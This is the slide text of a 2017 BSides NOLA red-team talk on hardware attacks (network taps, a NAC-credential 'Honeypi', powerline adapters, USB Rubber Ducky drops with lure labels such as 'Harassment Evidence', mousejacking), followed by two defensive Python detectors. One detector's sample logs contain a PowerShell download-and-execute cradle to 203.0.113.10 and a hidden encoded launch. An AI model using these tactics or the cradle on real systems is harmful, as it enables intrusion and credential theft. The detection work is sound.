
Security Risk Advisors - BSides NOLA 2017 - Your New Red Team Hardware Survival Pack

A few years ago all you needed was a 4-port switch and a Kali VM to reliably bypass most controls and have domain admin in a few hours. Defenses and networks have improved, and so should your red team arsenal. Spoiler alert: you're going to need a bigger backpack. This talk provides a practical guide to bypassing NAC controls, taking over workstations from the parking lot, and breaking into locked PCs. We'll walk through 5 different hardware devices: how to build them, how to use them effectively, and how to protect against them.


  1. YOUR NEW RED TEAM HARDWARE SURVIVAL PACK
     Chris Salerno | Dan Astor | Chris Myers
     BSides NOLA: 2017
  2. WHY MORE HARDWARE?
     • Networks are getting better
       ◦ Visibility + Security
     • Detection is getting better
       ◦ Rogue devices + Traffic analysis
     • Clients listening to recommendations
     • Finally…
  3. TOOLS WE'LL BE COVERING
     • Network Taps
     • Raspberry Pi's
     • Ethernet Over Power Line Adapters
     • USB Rubber Duckies
     • Mouse Jacking
  4. NACS AND ATTACKS
     • Network Access Control (NAC)
     • Passive Attacks
       ◦ Network TAPs + Packet CAPs
     • Active Attacks
       ◦ Pi's + Power Lines + Air Freshener or Tissue Box
  5. NETWORK TAPPIN'
     • Problem
       ◦ No Creds and Can't Do Traditional Recon
     • Solution
       ◦ Power Line Adapter + Network Tap + Packet Caps
       ◦ Sniff… Sniff…
         ▪ Host + Network Info
         ▪ Credentials (Network/Smart Printers or Switch Uplinks)
       ◦ PoE pass-through is a nice feature
  6. NETWORK TAPPIN'
  7. PI GOT UR NAC?
     • Problem
       ◦ Active NAC attempts to auth to any system plugged in, along with host checking
     • Solution – NAC Honeypi
       ◦ Raspberry Pi + Power Line Adapter + Air Freshener or Tissue Box
       ◦ SSH Honeypot
         ▪ Cowrie based
         ▪ https://github.com/micheloosterhof/cowrie
       ◦ Responder
         ▪ https://github.com/lgandx/Responder
  8. HONEYPI DEMO
  9. I'VE GOT THE POWER
     • Problem
       ◦ Need to Hide Physical Location
     • Solution
       ◦ Ethernet over Power Line
         ▪ Simple to use
         ▪ Transmits signal here to there
       ◦ Allows for stealthier ops
         ▪ Hide network taps
         ▪ Hide Raspberry Pi's
         ▪ Hide origin of systems/traffic
  10. ETHERNET OVER POWER LINE ADAPTERS
  11. USB DROPS & SCREEN UNLOCKS
     • Problem
       ◦ Need Shellz but Can't Plug Into the Network
     • Solution – Getting Shellz
       ◦ USB Rubber Ducky
         ▪ Inherently trusted in most environments
         ▪ Easy to pretend to be a keyboard
         ▪ https://hakshop.com/products/usb-rubber-ducky-deluxe
         ▪ Labels may help: Beach Pics, Harassment Evidence, HR, etc.
       ◦ Curious Users
         ▪ They plug anything in…
         ▪ Or take to HR, who then plug it in…
  12. WHEN USB DUCKS ATTACK…
     • Ducky Script
       ◦ Load a custom payload onto your Rubber Ducky
       ◦ https://ducktoolkit.com/
       ◦ PowerShell Attacks, Drop Malware, Etc.
     • Attack Scenarios
       ◦ USB Drops
         ▪ Go Aggro!
         ▪ Or slightly less aggro…
  13. PERIPHERAL ATTACKS?
     • Problem
       ◦ Need Shellz but Don't Have Physical Access
     • Solution
       ◦ Wireless peripherals + keystroke injection
         ▪ Logitech Unifying Receivers
         ▪ Assorted Microsoft Keyboards + Mice
         ▪ Can exploit to get remote C2's
       ◦ Arduino Mouse Jacker
         ▪ https://github.com/phikshun/uC_mousejack
       ◦ JackIt
         ▪ https://github.com/insecurityofthings/jackit
  14. RUBBER DUCKY & JACKIT DEMOS
  15. SO WHAT NOW??
     • USB Rubber Duckies
       ◦ HID/USB device whitelisting (GPO)
       ◦ Epoxy USB ports
     • Mouse Jacking
       ◦ Provide wired/non-vulnerable peripherals
       ◦ Log external calls for PowerShell
       ◦ Patch it yourself
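The slide above recommends logging external calls from PowerShell as a control against keystroke-injection payloads (Rubber Ducky and mousejacking both end in typed PowerShell). The following is an added detection example, not code from the talk or from Security Risk Advisors: it scans constructed PowerShell script-block log events (Event ID 4104 style, in a made-up `id|host|user|script` export format) and flags the things a HID-injected payload typically carries, such as a URL to a non-corporate host, a download primitive fed into `IEX`, a hidden window, or an encoded command. The internal domain suffix `corp.example` and the sample hosts and users are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample script-block log events (not real telemetry).
# Format assumed for this example: event_id|host|user|ScriptBlockText
SAMPLE_EVENTS = [
    "4104|WS-01|CORP\\alice|Get-ChildItem C:\\Users | Select-Object Name",
    "4104|WS-02|CORP\\bob|IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p.ps1')",
    "4104|WS-03|CORP\\carol|Invoke-WebRequest -Uri https://updates.corp.example/patch.msi -OutFile C:\\Temp\\patch.msi",
    "4104|WS-04|CORP\\dave|powershell -w hidden -NoP -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAA=",
]

URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)
# Built-in download primitives commonly seen in one-line staging commands.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer",
    re.IGNORECASE,
)
IEX_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)
# Real powershell.exe switches: -WindowStyle Hidden (abbreviated -w hidden)
# and -EncodedCommand (abbreviated -enc / -e) followed by a base64 blob.
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)
ENCODED_RE = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)


def parse_event(line):
    """Split one export line into its fields; the script text may itself contain '|'."""
    event_id, host, user, script = line.split("|", 3)
    return {"event_id": event_id, "host": host, "user": user, "script": script}


def is_internal(hostname, internal_suffixes):
    """True if the hostname is one of our domains (suffix match, case-insensitive)."""
    hostname = hostname.lower()
    return any(hostname == s or hostname.endswith("." + s) for s in internal_suffixes)


def external_urls(script, internal_suffixes):
    """Return every URL in the script whose host is not an internal domain."""
    found = []
    for url in URL_RE.findall(script):
        hostname = urlparse(url).hostname or ""
        if not is_internal(hostname, internal_suffixes):
            found.append(url)
    return found


def analyze(event, internal_suffixes):
    """Return the list of reasons this script block is worth a look (empty if none)."""
    script = event["script"]
    reasons = []
    ext = external_urls(script, internal_suffixes)
    if ext:
        reasons.append("external_url:" + ",".join(ext))
    has_cradle = bool(CRADLE_RE.search(script))
    if has_cradle:
        reasons.append("download_primitive")
    if IEX_RE.search(script) and (ext or has_cradle):
        reasons.append("download_and_execute")
    if HIDDEN_RE.search(script):
        reasons.append("hidden_window")
    if ENCODED_RE.search(script):
        reasons.append("encoded_command")
    return reasons


def severity(reasons):
    """External fetch, fetch-and-run, or hidden+encoded launch is high; anything else low."""
    if any(r.startswith("external_url") for r in reasons) or "download_and_execute" in reasons:
        return "high"
    if "hidden_window" in reasons and "encoded_command" in reasons:
        return "high"
    return "low"


def scan(lines, internal_suffixes=("corp.example",)):
    """Return one finding per flagged event, in input order."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = analyze(event, internal_suffixes)
        if reasons:
            findings.append({
                "host": event["host"],
                "user": event["user"],
                "reasons": reasons,
                "severity": severity(reasons),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["host"], finding["user"], finding["reasons"])
```

Run as-is it flags WS-02 (external fetch piped into `IEX`), WS-03 (a download primitive, but to an internal host, so low) and WS-04 (hidden window plus encoded command), and stays quiet on WS-01. Script-block logging has to be enabled for these events to exist in the first place, and the internal-suffix allowlist is what separates "external calls" from routine patching traffic, so keep it accurate.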
  16. SO WHAT NOW??
     • Powerline Adapters + Network Tap
       ◦ Physical security & user awareness
       ◦ Limit use of clear text protocols
     • Raspberry Pi
       ◦ Rogue device detection
       ◦ Don't auth to every system
         ▪ Ensure NAC service account passwords are complex as in RANDO…
         ▪ Don't SSH auth to every system… (or use certs)
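"Rogue device detection" on the slide above is the control that catches a Honeypi hanging off a powerline adapter. The following is an added example, not code from the talk: it takes a constructed switch MAC-table / DHCP-lease export (`switch,port,mac,ip,hostname`) and an asset inventory, and flags endpoints that are not in inventory, that carry a single-board-computer vendor prefix, that announce a default OS hostname, or that share an access port with another MAC. The sample MACs, switches and inventory are invented; the OUI-to-vendor entries are listed as an assumption to be verified against the IEEE OUI registry before use.

```python
from collections import Counter

# Constructed sample export, one observed endpoint per line (not real data).
OBSERVED = [
    "sw-floor2,Gi1/0/12,00:1b:21:3a:4c:5d,10.20.1.15,WS-02",
    "sw-floor2,Gi1/0/14,B8-27-EB-12-34-56,10.20.1.77,raspberrypi",
    "sw-floor2,Gi1/0/15,00:50:b6:aa:bb:cc,10.20.1.90,",
    "sw-floor3,Gi1/0/03,3c:97:0e:77:88:99,10.20.2.10,PRN-LOBBY",
    "sw-floor3,Gi1/0/03,dc:a6:32:01:02:03,10.20.2.44,kali",
]

# Constructed asset inventory: MAC -> asset tag.
INVENTORY = {
    "00:1b:21:3a:4c:5d": "WS-02",
    "3c:97:0e:77:88:99": "PRN-LOBBY",
}

# Assumption: vendor prefixes assigned to Raspberry Pi boards. Verify and extend
# from the IEEE OUI registry; this table is illustrative, not authoritative.
SBC_OUIS = {
    "b8:27:eb": "Raspberry Pi Foundation",
    "dc:a6:32": "Raspberry Pi Trading",
    "e4:5f:01": "Raspberry Pi Trading",
}

# Default hostnames of common SBC / pentest OS images, as sent in DHCP requests.
DEFAULT_HOSTNAMES = {"raspberrypi", "kali"}


def normalize_mac(mac):
    """Lower-case, colon-separated form so B8-27-EB-.. and b8:27:eb:.. compare equal."""
    return mac.strip().lower().replace("-", ":")


def parse_line(line):
    switch, port, mac, ip, hostname = [f.strip() for f in line.split(",")]
    return {"switch": switch, "port": port, "mac": normalize_mac(mac),
            "ip": ip, "hostname": hostname}


def classify(entry, inventory, port_counts):
    """Reasons an endpoint deserves a visit; empty list means nothing unusual."""
    reasons = []
    if entry["mac"] not in inventory:
        reasons.append("not_in_inventory")
    oui = entry["mac"][:8]
    if oui in SBC_OUIS:
        reasons.append("sbc_vendor:" + SBC_OUIS[oui])
    if entry["hostname"].lower() in DEFAULT_HOSTNAMES:
        reasons.append("default_hostname")
    # An access port normally carries one host; a second MAC behind it is
    # how a Pi bridged through a powerline adapter tends to show up.
    if port_counts[(entry["switch"], entry["port"])] > 1:
        reasons.append("multiple_macs_on_port")
    return reasons


def find_rogues(lines, inventory):
    """Return flagged endpoints (switch, port, mac, reasons) in input order."""
    entries = [parse_line(line) for line in lines]
    port_counts = Counter((e["switch"], e["port"]) for e in entries)
    findings = []
    for entry in entries:
        reasons = classify(entry, inventory, port_counts)
        if reasons:
            findings.append({"switch": entry["switch"], "port": entry["port"],
                             "mac": entry["mac"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_rogues(OBSERVED, INVENTORY):
        print(finding["switch"], finding["port"], finding["mac"], finding["reasons"])
```

Treat the output as a work queue for a physical check, not a verdict: MACs and hostnames are trivially spoofed, so the inventory and per-port checks are only as good as the asset database and the port-to-room mapping behind them. Legitimate shared ports (a phone daisy-chaining a PC, for example) should be recorded in the inventory so the multiple-MAC rule does not page on them every night.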
  17. QUESTIONS?
